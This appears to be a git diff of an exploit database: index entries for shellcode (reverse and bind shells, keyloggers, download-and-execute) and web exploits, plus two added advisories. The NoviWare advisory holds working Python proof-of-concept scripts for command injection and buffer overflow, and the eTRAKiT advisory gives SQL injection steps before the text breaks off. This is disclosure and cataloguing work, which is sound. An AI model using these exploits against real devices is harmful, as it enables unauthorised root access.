 39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Connect back to 10.0.0.10:1337 with /bin/sh Shellcode (95 bytes)",2016-02-26,Xeon,arm,shellcode,0
@@ -16314,16 +16321,16 @@ id,file,description,date,author,platform,type,port
 39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0
 39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - Bind 5600/TCP Shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
 40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() / SetFileAttributesA() / WinExec() / ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
-39722,platforms/lin_x86/shellcode/39722.c,"Linux/x86 - Reverse TCP Shellcode (IPv6) (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
+39722,platforms/lin_x86/shellcode/39722.c,"Linux/x86 - Reverse TCP (IPv6) Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
 39723,platforms/lin_x86/shellcode/39723.c,"Linux/x86 - Bind 1472/TCP (IPv6) Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
 39728,platforms/generator/shellcode/39728.py,"Linux/x86-64 - Bind Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",generator,shellcode,0
 39731,platforms/windows/shellcode/39731.c,"Windows - Primitive Keylogger to File Null-Free Shellcode (431 (0x01AF) bytes)",2016-04-25,Fugu,windows,shellcode,0
 39754,platforms/win_x86/shellcode/39754.txt,"Win32 .Net Framework - Execute Native x86 Shellcode",2016-05-02,Jacky5112,win_x86,shellcode,0
-39758,platforms/lin_x86-64/shellcode/39758.c,"Linux/x86-64 - Bind 1472/TCP Shellcode (IPv6) (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
-39763,platforms/lin_x86-64/shellcode/39763.c,"Linux/x86-64 - Reverse TCP Shellcode (IPv6) (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
+39758,platforms/lin_x86-64/shellcode/39758.c,"Linux/x86-64 - Bind 1472/TCP (IPv6) Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
+39763,platforms/lin_x86-64/shellcode/39763.c,"Linux/x86-64 - Reverse TCP Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
 39794,platforms/windows/shellcode/39794.c,"Windows - Functional Keylogger to File Null-Free Shellcode (601 (0x0259) bytes)",2016-05-10,Fugu,windows,shellcode,0
-39815,platforms/lin_x86/shellcode/39815.c,"Linux/x86 - Bind Shell Configurable Port Shellcode (87 bytes)",2016-05-16,JollyFrogs,lin_x86,shellcode,0
-39844,platforms/lin_x86-64/shellcode/39844.c,"Linux/x86-64 - Reverse TCP Shell Null-Free Shellcode (134 bytes)",2016-05-20,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
+39815,platforms/lin_x86/shellcode/39815.c,"Linux/x86 - Bind Shell 1234/TCP (Configurable Port) Shellcode (87 bytes)",2016-05-16,JollyFrogs,lin_x86,shellcode,0
+39844,platforms/lin_x86-64/shellcode/39844.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)",2016-05-20,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
 39847,platforms/lin_x86-64/shellcode/39847.c,"Linux/x86-64 - Information Stealer Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
 39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind Shell 4444/TCP Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
 39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - execve (XOR Encoded) Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
@@ -16338,23 +16345,23 @@ id,file,description,date,author,platform,type,port
 40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - Bind Netcat Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode,0
 40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - Bind Shell 4444/TCP Shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0
 40061,platforms/lin_x86-64/shellcode/40061.c,"Linux/x86-64 - Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode,0
-40075,platforms/lin_x86/shellcode/40075.c,"Linux/x86 - Reverse TCP Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode,0
+40075,platforms/lin_x86/shellcode/40075.c,"Linux/x86 - Reverse TCP Shell Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode,0
 40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Reverse Continuously Probing Shell via Socket + Port-range + Password Shellcode (172 bytes)",2016-07-11,Kyzer,lin_x86-64,shellcode,0
 40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10 Shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0
-40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell / Multi-terminal / Password / Daemon Shellcode (83_ 148_ 177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0
+40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell / Multi-terminal / Password / Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0
 40128,platforms/linux_crisv32/shellcode/40128.c,"Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)",2016-07-20,bashis,linux_crisv32,shellcode,0
 40131,platforms/lin_x86/shellcode/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,lin_x86,shellcode,0
-40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Subtle Probing Reverse Shell / Timer_ Burst / Password / Multi-Terminal Shellcode (84_ 122_ 172 bytes)",2016-07-21,Kyzer,lin_x86-64,shellcode,0
+40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357) / Subtle Probing / Timer / Burst / Password / Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,lin_x86-64,shellcode,0
 40175,platforms/win_x86/shellcode/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
-40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - Bind Netcat with Port Shellcode (44/52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0
+40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - Bind Netcat 98/TCP + UDP Shellcode (44/52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0
 40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - Bind zsh 9090/TCP Shellcode (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
-40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - Reverse ZSH 127.255.255.254:9090/TCP Shellcode (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
+40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - Reverse TCP ZSH (127.255.255.254:9090/TCP) Shellcode (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
 40245,platforms/win_x86/shellcode/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 40246,platforms/win_x86/shellcode/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 40259,platforms/win_x86/shellcode/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 40549,platforms/win_x86-64/shellcode/40549.c,"Windows x64 - WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
-40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Reverse UDP Keylogger Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0
-40781,platforms/win_x86-64/shellcode/40781.c,"Windows x64 - Reverse Shell TCP Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
+40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0
+40781,platforms/win_x86-64/shellcode/40781.c,"Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 40808,platforms/lin_x86-64/shellcode/40808.c,"Linux/x86-64 - /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",lin_x86-64,shellcode,0
 40821,platforms/win_x86-64/shellcode/40821.c,"Windows x64 - Download + Execute Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 40872,platforms/lin_x86/shellcode/40872.c,"Linux/x86 - Reverse Netcat (-e option disabled) Shell Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",lin_x86,shellcode,0
@@ -16369,22 +16376,22 @@ id,file,description,date,author,platform,type,port
 41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
 41375,platforms/linux/shellcode/41375.c,"Linux - Bind Shell Dual/Multi Mode Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
 41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
-41398,platforms/lin_x86-64/shellcode/41398.nasm,"Linux/x86-64 - Reverse TCP Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",lin_x86-64,shellcode,0
+41398,platforms/lin_x86-64/shellcode/41398.nasm,"Linux/x86-64 - Reverse TCP Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",lin_x86-64,shellcode,0
 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,lin_x86,shellcode,0
 41439,platforms/lin_x86-64/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,lin_x86-64,shellcode,0
 41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,lu0xheap,win_x86,shellcode,0
 41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86-64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
-41477,platforms/lin_x86-64/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",lin_x86-64,shellcode,0
-41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
+41477,platforms/lin_x86-64/shellcode/41477.c,"Linux/x86-64 - Reverse TCP Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",lin_x86-64,shellcode,0
+41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
 41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Setuid(0) + Execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
 41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Flush IPTables Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
-41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - Reverse Netcat Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
+41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - Reverse Netcat (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
 41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Reverse Netcat Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
 41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0
 41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - exceve(_/bin/sh_) Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0
 41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
 41635,platforms/lin_x86/shellcode/41635.txt,"Linux/x86 - File Reader Shellcode (54 Bytes)",2017-03-19,WangYihang,lin_x86,shellcode,0
-42295,platforms/lin_x86/shellcode/42295.c,"Linux/x86 - Reverse TCP Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",lin_x86,shellcode,0
+42295,platforms/lin_x86/shellcode/42295.c,"Linux/x86 - Reverse TCP Shell Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",lin_x86,shellcode,0
 41723,platforms/lin_x86/shellcode/41723.c,"Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)",2017-03-24,JR0ch17,lin_x86,shellcode,0
 41750,platforms/lin_x86-64/shellcode/41750.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (21 Bytes)",2017-03-28,WangYihang,lin_x86-64,shellcode,0
 41757,platforms/lin_x86/shellcode/41757.txt,"Linux/x86 - execve(_/bin/sh_) Shellcode (21 bytes)",2017-03-29,WangYihang,lin_x86,shellcode,0
@@ -16392,15 +16399,16 @@ id,file,description,date,author,platform,type,port
 41883,platforms/lin_x86-64/shellcode/41883.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (31 bytes)",2017-04-13,WangYihang,lin_x86-64,shellcode,0
 41909,platforms/lin_x86/shellcode/41909.c,"Linux/x86 - Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,lin_x86,shellcode,0
 41969,platforms/lin_x86/shellcode/41969.c,"Linux/x86 - Disable ASLR Shellcode (80 bytes)",2017-05-08,abatchy17,lin_x86,shellcode,0
-41970,platforms/lin_x86-64/shellcode/41970.asm,"Linux/x86-64 - Reverse Shell Shellcode (IPv6) (113 bytes)",2017-05-08,Srakai,lin_x86-64,shellcode,0
+41970,platforms/lin_x86-64/shellcode/41970.asm,"Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) Shellcode (IPv6) (113 bytes)",2017-05-08,Srakai,lin_x86-64,shellcode,0
 42016,platforms/windows/shellcode/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",windows,shellcode,0
 42126,platforms/lin_x86-64/shellcode/42126.c,"Linux/x86-64 - /bin/sh Shellcode (31 bytes)",2017-06-05,"Touhid M.Shaikh",lin_x86-64,shellcode,0
 42177,platforms/lin_x86/shellcode/42177.c,"Linux/x86 - execve(/bin/sh) setuid(0) setgid(0) (XOR Encoded) Shellcode (66 bytes)",2017-06-15,nullparasite,lin_x86,shellcode,0
-42179,platforms/lin_x86-64/shellcode/42179.c,"Linux/x86_64 - execve(_/bin/sh_) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,lin_x86-64,shellcode,0
-42208,platforms/lin_x86/shellcode/42208.nasm,"Linux/x86 - Reverse UDP Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",lin_x86,shellcode,0
-42254,platforms/lin_x86/shellcode/42254.c,"Linux/x86 - Bind Shell Shellcode (75 bytes)",2017-06-26,wetw0rk,lin_x86,shellcode,0
-42339,platforms/lin_x86-64/shellcode/42339.c,"Linux/x86_64 - Reverse Shell (192.168.1.8:4444) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,lin_x86-64,shellcode,0
+42179,platforms/lin_x86-64/shellcode/42179.c,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,lin_x86-64,shellcode,0
+42208,platforms/lin_x86/shellcode/42208.nasm,"Linux/x86 - Reverse UDP Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",lin_x86,shellcode,0
+42254,platforms/lin_x86/shellcode/42254.c,"Linux/x86 - Bind Shell 4444/TCP Shellcode (75 bytes)",2017-06-26,wetw0rk,lin_x86,shellcode,0
+42339,platforms/lin_x86-64/shellcode/42339.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,lin_x86-64,shellcode,0
 42428,platforms/lin_x86/shellcode/42428.c,"Linux x86 - /bin/sh Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",lin_x86,shellcode,0
+42485,platforms/lin_x86-64/shellcode/42485.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",lin_x86-64,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -37740,7 +37748,7 @@ id,file,description,date,author,platform,type,port
 41283,platforms/php/webapps/41283.txt,"Mobiketa 3.5 - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
 41284,platforms/php/webapps/41284.txt,"Sendroid 5.2 - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
 41285,platforms/php/webapps/41285.txt,"Fome SMS Portal 2.0 - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
-41286,platforms/php/webapps/41286.txt,"SOA School Management - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
+41286,platforms/php/webapps/41286.txt,"SOA School Management - 'view' Parameter SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
 41287,platforms/php/webapps/41287.txt,"Client Expert 1.0.1 - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
 41288,platforms/php/webapps/41288.txt,"EXAMPLO - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
 41290,platforms/php/webapps/41290.txt,"CMS Lite 1.3.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
@@ -38166,6 +38174,7 @@ id,file,description,date,author,platform,type,port
 42105,platforms/multiple/webapps/42105.html,"WebKit - CachedFrame does not Detach Openers Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
 42106,platforms/multiple/webapps/42106.html,"WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
 42107,platforms/multiple/webapps/42107.html,"WebKit - 'Document::prepareForDestruction' and 'CachedFrame' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
+42111,platforms/json/webapps/42111.txt,"Sungard eTRAKiT3 <= 3.2.1.17 - SQL Injection",2017-06-02,"Goran Tuzovic",json,webapps,0
 42113,platforms/php/webapps/42113.txt,"Joomla! Component Payage 2.05 - 'aid' Parameter SQL Injection",2017-06-03,"Persian Hack Team",php,webapps,0
 42114,platforms/hardware/webapps/42114.py,"EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution",2017-06-04,LiquidWorm,hardware,webapps,0
 42117,platforms/windows/webapps/42117.txt,"Subsonic 6.1.1 - Cross-Site Request Forgery",2017-06-05,hyp3rlinx,windows,webapps,0
@@ -38280,3 +38289,21 @@ id,file,description,date,author,platform,type,port
 42461,platforms/php/webapps/42461.txt,"Online Quiz Project 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",php,webapps,0
 42462,platforms/php/webapps/42462.txt,"Photogallery Project 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",php,webapps,0
 42463,platforms/php/webapps/42463.txt,"Doctor Patient Project 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",php,webapps,0
+42482,platforms/php/webapps/42482.txt,"Food Ordering Script 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",php,webapps,0
+42487,platforms/php/webapps/42487.txt,"LiveCRM 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42488,platforms/php/webapps/42488.txt,"LiveSupport 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42489,platforms/php/webapps/42489.txt,"LiveInvoices 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42490,platforms/php/webapps/42490.txt,"LiveSales 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42491,platforms/php/webapps/42491.txt,"LiveProjects 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42519,platforms/jsp/webapps/42519.txt,"Symantec Messaging Gateway 10.6.3-2 - Unauthenticated root Remote Command Execution",2017-08-18,"Philip Pettersson",jsp,webapps,0
+42492,platforms/php/webapps/42492.txt,"Joomla! Component Appointment 1.1 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42493,platforms/php/webapps/42493.txt,"Joomla! Component Twitch Tv 1.1 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42494,platforms/php/webapps/42494.txt,"Joomla! Component KissGallery 1.0.0 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42496,platforms/php/webapps/42496.txt,"Matrimony Script 2.7 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42497,platforms/php/webapps/42497.txt,"eCardMAX 10.5 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42499,platforms/php/webapps/42499.txt,"SOA School Management 3.0 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42500,platforms/php/webapps/42500.txt,"Joomla! Component Zap Calendar Lite 4.3.4 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42501,platforms/php/webapps/42501.txt,"Joomla! Component Calendar Planner 1.0.1 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42502,platforms/php/webapps/42502.txt,"Joomla! Component SP Movie Database 1.3 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42504,platforms/php/webapps/42504.txt,"DeWorkshop 1.0 - Arbitrary File Upload",2017-08-18,"Ihsan Sencan",php,webapps,0
+42517,platforms/xml/webapps/42517.txt,"QuantaStor Software Defined Storage < 4.3.1 - Multiple Vulnerabilities",2017-08-18,VVVSecurity,xml,webapps,0
diff --git a/platforms/hardware/dos/42518.txt b/platforms/hardware/dos/42518.txt
new file mode 100755
index 000000000..b0efa09b0
--- /dev/null
+++ b/platforms/hardware/dos/42518.txt
@@ -0,0 +1,161 @@
+NoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities
+
+
+Introduction
+==========
+NoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant
+switch software developed by NoviFlow and available for license to
+network equipment manufacturers.
+Multiple vulnerabilities were identified in the NoviWare software
+deployed on NoviSwitch devices. They could allow a remote attacker to
+gain privileged code execution on the switch (non-default
+configuration) or a low-privileged CLI user to execute code as root.
+
+
+CVEs
+=====
+* CVE-2017-12784: remote code execution in novi_process_manager_daemon
+Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
+
+* CVE-2017-12785: cli breakout in novish
+Indicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)
+
+* CVE-2017-12786: remote code execution in noviengine and cliengine
+Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
+
+
+Affected versions
+==============
+NoviWare <= NW400.2.6 and devices where a vulnerable NoviWare version
+is deployed
+
+
+Author
+======
+François Goichon - Google Security Team
+
+
+CVE-2017-12784
+==============
+Remote code execution in novi_process_manager_daemon
+
+Summary
+-------------
+The NoviWare switching software distribution is prone to two distinct
+bugs which could potentially allow a remote, unauthenticated attacker
+to gain privileged (root) code execution on the switch device.
+- A flaw when applying ACL changes requested from the CLI could expose
+the novi_process_manager_daemon network service
+- This network service is prone to command injection and a stack-based
+buffer overflow
+
+Reproduction
+------------------
+If TCP port 2020 is accepting connections from the network, the
+following python script can be used to ping yourself on vulnerable
+versions :
+---
+from struct import pack
+import socket
+
+s = socket.socket()
+s.connect((<switch host>, 2020))
+
+payload = pack("<I", 0xffffffff).ljust(0x24) + "ping <your ip>; echo\x00"
+s.sendall(pack("<II", 1, len(payload)+8))
+s.sendall(payload)
+
+s.close()
+---
+
+On vulnerable versions, the appliance will perform an ICMP request to
+the specified IP, which can be observed in network logs.
+
+Remediation
+-----------------
+- Upgrade to NoviWare400 3.0 or later.
+- NoviFlow customers should have received instructions on how to get
+the latest release along with release notes. For more information,
+contact support@noviflow.com.
+
+
+CVE-2017-12785
+==============
+Cli breakout in novish
+
+Summary
+-------------
+The NoviWare switching software distribution is prone to a buffer
+overflow and a command injection, allowing authenticated,
+low-privileged users to break out of the CLI and execute commands as
+root.
+
+Reproduction
+------------------
+Log in to the appliance via SSH and run the following command from the CLI:
+--
+noviswitch# show log cli username
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+--
+
+If the appliance is vulnerable, the cli crashes and the session ends.
+
+Remediation
+-----------------
+- Upgrade to NoviWare400 3.0 or later.
+- NoviFlow customers should have received instructions on how to get
+the latest release along with release notes. For more information,
+contact support@noviflow.com.
+
+
+CVE-2017-12786
+==============
+Remote code execution in noviengine and cliengine
+
+Summary
+-------------
+The NoviWare switching software distribution is prone to two distinct
+bugs which could potentially allow a remote, unauthenticated attacker
+to gain privileged (root) code execution on the switch device.
+- A flaw when applying ACL changes requested from the CLI could expose
+noviengine and cliengine network services
+- These network services are prone to a stack-based buffer overflow
+when unpacking serialized values.
+
+Reproduction
+------------------
+If TCP ports 9090 or 12345 are accepting connections from the network,
+the following python script can be used to cause a crash on vulnerable
+versions :
+---
+from struct import pack
+import socket
+
+s = socket.socket()
+s.connect((<switch host>, <9090 or 12345>))
+
+payload = "".join([pack("<I", 4) + "AAAA" for i in xrange(408)])
+payload = pack("<IIQ", 0, len(payload) + 16, 0) + payload
+s.sendall(payload)
+
+s.read(1)
+s.close()
+---
+
+A watchdog should restart the service if it has crashed.
+
+Remediation
+-----------------
+- Upgrade to NoviWare400 3.0 or later.
+- NoviFlow customers should have received instructions on how to get
+the latest release along with release notes. For more information,
+contact support@noviflow.com.
+
+
+Disclosure timeline
+===============
+2017/05/11 - Report sent to NoviFlow
+2017/05/26 - Bugs acknowledged and remediation timeline confirmed
+2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities
+2017/08/09 - CVE requests
+2017/08/16 - Public disclosure
\ No newline at end of file
diff --git a/platforms/json/webapps/42111.txt b/platforms/json/webapps/42111.txt
new file mode 100755
index 000000000..5a2d337db
--- /dev/null
+++ b/platforms/json/webapps/42111.txt
@@ -0,0 +1,47 @@
+Software: Sungard eTRAKiT3
+Version: 3.2.1.17 and possibly lower
+CVE: CVE-2016-6566 (https://www.kb.cert.org/vuls/id/846103)
+Vulnerable Component:  Login page 
+
+
+Description
+================
+The login form is vulnerable to blind SQL injection by an unauthenticated user.
+
+
+Vulnerabilities
+================
+The "valueAsString" parameter inside the JSON payload contained by the "ucLogin_txtLoginId_ClientStat" POST parameter is not properly validated. An unauthenticated remote attacker may modify the POST request and insert a SQL query which will then be executed by the backend server. eTRAKiT 3.2.1.17 was tested, but other versions may also be vulnerable.
+
+ 
+Proof of concept
+================
+Steps to Reproduce:
+	1. Configure browser to use burp suite as proxy
+	2. Turn interceptor on in burp suite
+	3. Attempt to log in to etrakit3 website
+	4. Modify the resulting HTTP request in the following way
+	5. Locate the JSON payload contained by the ucLogin_txtLoginId_ClientStat POST parameter
